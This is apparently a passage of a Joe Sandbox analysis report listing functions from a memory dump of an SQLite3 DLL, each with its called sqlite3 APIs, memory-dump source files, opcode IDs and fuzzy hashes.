                                                      • Part of subcall function 61E17D9D: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E18153
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E38AB1
                                                    • sqlite3_vfs_find.SQLITE3 ref: 61E38AF0
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E38BEF
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializesqlite3_vfs_find
                                                    • String ID:
                                                    • API String ID: 321126751-0
                                                    • Opcode ID: 1cf183f6e11154e130d5e09ade6e545aac47220eb7dc192b5cff036ac5fbe601
                                                    • Instruction ID: 6eafff5aa89e60207affa5d4375b1fd848e4bfa68ec86d0645134cd1debdfc33
                                                    • Opcode Fuzzy Hash: 1cf183f6e11154e130d5e09ade6e545aac47220eb7dc192b5cff036ac5fbe601
                                                    • Instruction Fuzzy Hash: E8416D7581CAE88EC716CB298580BD97FB0AB9BB08F188ADAD5C487343C234C189DB51
                                                    Function 61E25536 Relevance: 6.1, APIs: 4, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_value_blob
                                                    • String ID:
                                                    • API String ID: 3596987688-0
                                                    • Opcode ID: f589e380e590d904d03d8d7319362dca47a5ac0f7a167cf08e97a6fe005fcebe
                                                    • Instruction ID: 1c38c955144ea272a2390abd7037640f67441b8e32e5bcecfe3d6a287c872bc2
                                                    • Opcode Fuzzy Hash: f589e380e590d904d03d8d7319362dca47a5ac0f7a167cf08e97a6fe005fcebe
                                                    • Instruction Fuzzy Hash: AA31E2B1A086069FC700DF69C88169EBBF4BF88324F24C92DE4A8D7350D739D9018F91
                                                    Function 61E232B8 Relevance: 6.1, APIs: 4, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_win32_is_nt.SQLITE3 ref: 61E2332E
                                                    • sqlite3_snprintf.SQLITE3 ref: 61E233C6
                                                    • sqlite3_snprintf.SQLITE3 ref: 61E233E6
                                                    • sqlite3_free.SQLITE3 ref: 61E233EE
                                                      • Part of subcall function 61E124A0: sqlite3_free.SQLITE3 ref: 61E12546
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_snprintf$sqlite3_win32_is_nt
                                                    • String ID:
                                                    • API String ID: 4082161338-0
                                                    • Opcode ID: 5ddd944b775c133d06ee1fe0254d5750021fc4bbc16e31a516e0fd905e835963
                                                    • Instruction ID: 91323efb4649a3d8191086a1e5e29b4b9517918b9160c6e8c2a853c326c1c5c9
                                                    • Opcode Fuzzy Hash: 5ddd944b775c133d06ee1fe0254d5750021fc4bbc16e31a516e0fd905e835963
                                                    • Instruction Fuzzy Hash: 6431B1B09087469FD700EFAAD49874EBBF0BB89759F20C81DE4A897340DB79C5458F92
                                                    Function 61E19125 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_malloc.SQLITE3 ref: 61E1913F
                                                      • Part of subcall function 61E18306: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E17FE7,?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E1830E
                                                    • sqlite3_stricmp.SQLITE3 ref: 61E19187
                                                    • sqlite3_stricmp.SQLITE3 ref: 61E191AE
                                                    • sqlite3_free.SQLITE3 ref: 61E191DC
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_stricmp$sqlite3_freesqlite3_initializesqlite3_malloc
                                                    • String ID:
                                                    • API String ID: 2308590742-0
                                                    • Opcode ID: cad0b0d0311b93eed4e46c650285c507a2cb488b74f7c63188bf6478fd8f0856
                                                    • Instruction ID: 6b692e2189e6e0ee0aa3e267ec0681a1a6bf0909d4dd30762781afaae833dac3
                                                    • Opcode Fuzzy Hash: cad0b0d0311b93eed4e46c650285c507a2cb488b74f7c63188bf6478fd8f0856
                                                    • Instruction Fuzzy Hash: A7219331B0C2558BE7018E69884A75B7BE6AFC5358F3AC46CCC988B34DD775D882C791
                                                    Function 61E24B65 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_stricmpsqlite3_value_text
                                                    • String ID:
                                                    • API String ID: 3779612131-0
                                                    • Opcode ID: 4b55b895c7c587070ad7d2e0483850c7eaaa3f7e7f5560d8949455157410a5c5
                                                    • Instruction ID: 2f4b1ef36b232f1f79d1d11043bad1a67cbed5b2bb1a990bba85befbac6d479c
                                                    • Opcode Fuzzy Hash: 4b55b895c7c587070ad7d2e0483850c7eaaa3f7e7f5560d8949455157410a5c5
                                                    • Instruction Fuzzy Hash: 811160B16047499BCB04DF6DC8952897BA0FB88374F24C62EED688B380D334D6518F81
                                                    Function 61E12C7B Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E12C8D
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E12CDB
                                                      • Part of subcall function 61E0FFF3: sqlite3_mutex_enter.SQLITE3 ref: 61E10032
                                                      • Part of subcall function 61E0FFF3: sqlite3_mutex_leave.SQLITE3 ref: 61E100DA
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E12CFF
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E12D20
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 1477753154-0
                                                    • Opcode ID: e4ba57bcc9aa11d95742446a76e73ce82c497d4561cefe05b7a6c3a5820914b8
                                                    • Instruction ID: de5f51e8bf06ec65901cb552a7a477954c4035606b2e42264b4c0d4bbd519806
                                                    • Opcode Fuzzy Hash: e4ba57bcc9aa11d95742446a76e73ce82c497d4561cefe05b7a6c3a5820914b8
                                                    • Instruction Fuzzy Hash: FD111C74614F429BEB00DFAAC4C161977A1F797308F75882ED6448B305E730D8918B52
                                                    Function 61E38569 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_mprintf.SQLITE3 ref: 61E385BB
                                                    • sqlite3_result_error.SQLITE3 ref: 61E385D5
                                                    • sqlite3_free.SQLITE3 ref: 61E385DD
                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E385E7
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_error_nomem
                                                    • String ID:
                                                    • API String ID: 3282944778-0
                                                    • Opcode ID: 30638b5e0da7529ab82bec24ad164ef5052e415ad1a4157cc63648fa41477a5f
                                                    • Instruction ID: 4ae9a4c50960fe14620ca5c42550bca3380db2461356ebe3eb83e949ca3b7507
                                                    • Opcode Fuzzy Hash: 30638b5e0da7529ab82bec24ad164ef5052e415ad1a4157cc63648fa41477a5f
                                                    • Instruction Fuzzy Hash: 19017C709087569ADB119F65C840AAEBBE4AFC4368F24C62EE898C3384D734D582CB52
                                                    Function 61E887FA Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_initialize.SQLITE3 ref: 61E88806
                                                      • Part of subcall function 61E17D9D: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E17DD4
                                                      • Part of subcall function 61E17D9D: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21FFA), ref: 61E17E08
                                                      • Part of subcall function 61E17D9D: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E18153
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E88820
                                                    • sqlite3_realloc64.SQLITE3 ref: 61E88855
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E8887D
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializesqlite3_realloc64
                                                    • String ID:
                                                    • API String ID: 1177761455-0
                                                    • Opcode ID: 3940b7219479b7662e2b18a7ab7bdf3e41b8d10af36ee70f85f37dc9129227e5
                                                    • Instruction ID: 82a92f6c2a4da1edd986f7c79768939f765e53102f46d3e9e5c53b75c1deb679
                                                    • Opcode Fuzzy Hash: 3940b7219479b7662e2b18a7ab7bdf3e41b8d10af36ee70f85f37dc9129227e5
                                                    • Instruction Fuzzy Hash: 09015270514A45DFD700AFAAD481B19BBE4FB87349F64C93DD988CB310E731D4518791
                                                    Function 61E89890 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: __dllonexit_lock_onexit_unlock
                                                    • String ID:
                                                    • API String ID: 209411981-0
                                                    • Opcode ID: 0b329418206f961a7fefb904eaa5c9ee5d06d1daa3a33764bb30d423136114c4
                                                    • Instruction ID: d42cf47b82bde2e0933e2e85652617ee4f67219b2c6bca91ce5356ec92bdece3
                                                    • Opcode Fuzzy Hash: 0b329418206f961a7fefb904eaa5c9ee5d06d1daa3a33764bb30d423136114c4
                                                    • Instruction Fuzzy Hash: E91193B4919B418BCB84EF75C48451ABBF0BB85204F518C2EE4C887350E735D4849B82
                                                    Function 61E0C72E Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_free.SQLITE3 ref: 61E0C766
                                                      • Part of subcall function 61E0A23E: sqlite3_free.SQLITE3 ref: 61E0A25F
                                                    • sqlite3_free.SQLITE3 ref: 61E0C779
                                                    • sqlite3_free.SQLITE3 ref: 61E0C75B
                                                      • Part of subcall function 61E09B91: sqlite3_mutex_enter.SQLITE3 ref: 61E09BB0
                                                    • sqlite3_free.SQLITE3 ref: 61E0C7A7
                                                      • Part of subcall function 61E0A3D5: sqlite3_free.SQLITE3 ref: 61E0A3E6
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_mutex_enter
                                                    • String ID:
                                                    • API String ID: 3930042888-0
                                                    • Opcode ID: 998a1b93c3934b66009581dfff4d8bd905a61c3dc3c16e417c699d2cb29820c4
                                                    • Instruction ID: 246c50150b07d99a6da12206235ef0e8eb5b44f28a78b9ae3d00be616a555c05
                                                    • Opcode Fuzzy Hash: 998a1b93c3934b66009581dfff4d8bd905a61c3dc3c16e417c699d2cb29820c4
                                                    • Instruction Fuzzy Hash: F5017131A0464A8BD700AF78D8C085EF7F4EF8431AF61886DD8888B310EB74E8668B55
                                                    Function 61E37DA7 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_vmprintf.SQLITE3 ref: 61E37DC8
                                                      • Part of subcall function 61E34CFC: sqlite3_initialize.SQLITE3 ref: 61E34D02
                                                    • sqlite3_mprintf.SQLITE3 ref: 61E37DF2
                                                    • sqlite3_free.SQLITE3 ref: 61E37DFD
                                                    • sqlite3_free.SQLITE3 ref: 61E37E10
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_initializesqlite3_mprintfsqlite3_vmprintf
                                                    • String ID:
                                                    • API String ID: 690915108-0
                                                    • Opcode ID: 042c3354a15988b7bb99ffbd12849ea209f44d83849901565af73f242dd8749b
                                                    • Instruction ID: 61e2fc0e8378363947e4e1a8c5069337b3e99e6d9cd9c1d9670bdac722bad1ef
                                                    • Opcode Fuzzy Hash: 042c3354a15988b7bb99ffbd12849ea209f44d83849901565af73f242dd8749b
                                                    • Instruction Fuzzy Hash: BA01CC71A08716DFD7509FAAC48565ABBE4FF88354F60882DE998C7300E734D851CF61
                                                    Function 61E1F1C8 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_aggregate_context.SQLITE3 ref: 61E1F1DD
                                                    • sqlite3_result_error.SQLITE3 ref: 61E1F20D
                                                    • sqlite3_result_double.SQLITE3 ref: 61E1F223
                                                    • sqlite3_result_int64.SQLITE3 ref: 61E1F23B
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_aggregate_contextsqlite3_result_doublesqlite3_result_errorsqlite3_result_int64
                                                    • String ID:
                                                    • API String ID: 3779139978-0
                                                    • Opcode ID: 7181b022ff68177d75007b695be52a915d23f6850dd054c2618b03bfd4d29a62
                                                    • Instruction ID: 20038670ec940e04dbb1b391f77b345d4ac2b8364981b652614c85db4077a86b
                                                    • Opcode Fuzzy Hash: 7181b022ff68177d75007b695be52a915d23f6850dd054c2618b03bfd4d29a62
                                                    • Instruction Fuzzy Hash: 82011EB440C741DEDB009F64D486759BFE5AB49718F25C59DE4980B3A6C778C488CB82
                                                    Function 61E18162 Relevance: 6.0, APIs: 4, Instructions: 38stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_initialize.SQLITE3 ref: 61E18170
                                                      • Part of subcall function 61E17D9D: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E17DD4
                                                      • Part of subcall function 61E17D9D: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21FFA), ref: 61E17E08
                                                      • Part of subcall function 61E17D9D: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E18153
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E18188
                                                    • strcmp.MSVCRT ref: 61E181A5
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E181B6
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializestrcmp
                                                    • String ID:
                                                    • API String ID: 2933023327-0
                                                    • Opcode ID: 54f141e1108a671dcd311376d8f045d53a3e31a9e10b68f89fae59e1705d69da
                                                    • Instruction ID: 917e24e566aab7576b03b7f401f248ab127e1911a44b1f0735f7fd5be304d574
                                                    • Opcode Fuzzy Hash: 54f141e1108a671dcd311376d8f045d53a3e31a9e10b68f89fae59e1705d69da
                                                    • Instruction Fuzzy Hash: 55F06D72B0D7415BE7006FA9C9C1A1ABBF8AB8269DF28843CDD448B305E730D81097E1
